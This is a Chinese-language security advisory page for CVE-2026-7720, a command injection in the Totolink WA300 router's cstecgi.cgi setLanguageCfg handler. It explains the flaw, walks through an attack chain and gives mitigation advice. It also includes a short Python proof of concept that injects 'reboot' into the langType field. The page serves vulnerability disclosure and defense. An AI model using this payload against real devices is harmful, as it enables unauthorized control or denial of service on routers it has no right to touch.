IPBUF安全漏洞报告
English
CVE-2026-7720 CVSS 6.3 中危

CVE-2026-7720 Totolink WA300命令注入漏洞

披露日期: 2026-05-04

漏洞信息

漏洞编号
CVE-2026-7720
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink WA300

相关标签

命令注入RCETotolinkIoT路由器CVE-2026-7720

漏洞概述

Totolink WA300路由器在5.2cu.7112_B20190227版本中被发现存在一处安全漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中setLanguageCfg函数对POST请求参数的处理不当。由于未对langType参数进行严格的过滤,远程攻击者可通过构造恶意数据包实施命令注入攻击。利用此漏洞仅需低权限且无需用户交互,可能会导致系统机密性、完整性及可用性受损。

技术细节

该漏洞属于典型的操作系统命令注入(OS Command Injection)。漏洞点位于Totolink WA300路由器的Web管理接口/cgi-bin/cstecgi.cgi中。当处理setLanguageCfg功能的POST请求时,程序从HTTP请求体中提取langType参数,并将其直接传递给后端的系统命令执行函数,未经过任何安全过滤或转义。攻击者可以通过在langType参数中插入Shell元字符(如;, |, &&等),拼接恶意的系统命令。由于该接口的认证要求较低(PR:L),攻击者在获得一定访问权限后,即可通过网络向目标设备发送特制的HTTP POST数据包。服务器解析该请求后,会执行注入的恶意命令,从而在设备底层操作系统上下文中获得非预期的执行权限,进而控制受影响的路由器设备。

攻击链分析

STEP 1
侦察与访问
攻击者识别出目标为Totolink WA300路由器,并获取了低权限的访问凭据(如果需要认证)。
STEP 2
构造恶意请求
攻击者构造一个特制的HTTP POST请求,目标路径为/cgi-bin/cstecgi.cgi,并在langType参数中插入通过分隔符拼接的恶意Shell命令。
STEP 3
触发注入
服务器接收请求并调用setLanguageCfg函数处理,由于缺乏过滤,将langType参数的值直接传递给系统Shell执行。
STEP 4
执行命令与影响
注入的恶意命令在路由器操作系统上被执行,攻击者借此获取系统控制权、窃取敏感数据或导致服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable device target_url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" # Malicious payload demonstrating command injection # The payload attempts to inject a shell command (e.g., 'reboot' or 'ping') # using a command separator like ';' or '&&'. payload_data = { "topicurl": "setLanguageCfg", "langType": "English;reboot;" # Injecting 'reboot' command } try: # Sending the malicious POST request response = requests.post(target_url, data=payload_data) # Output the server response for verification print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") except requests.exceptions.RequestException as e: print(f"An error occurred: {e}")

影响范围

Totolink WA300 5.2cu.7112_B20190227

防御指南

临时缓解措施
建议用户立即检查设备固件版本并应用官方补丁。若无法立即升级,应禁用路由器的远程Web管理功能,并将管理接口仅限制在受信任的内网环境中访问。同时,修改默认的管理员账户密码以减少被低权限攻击者利用的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表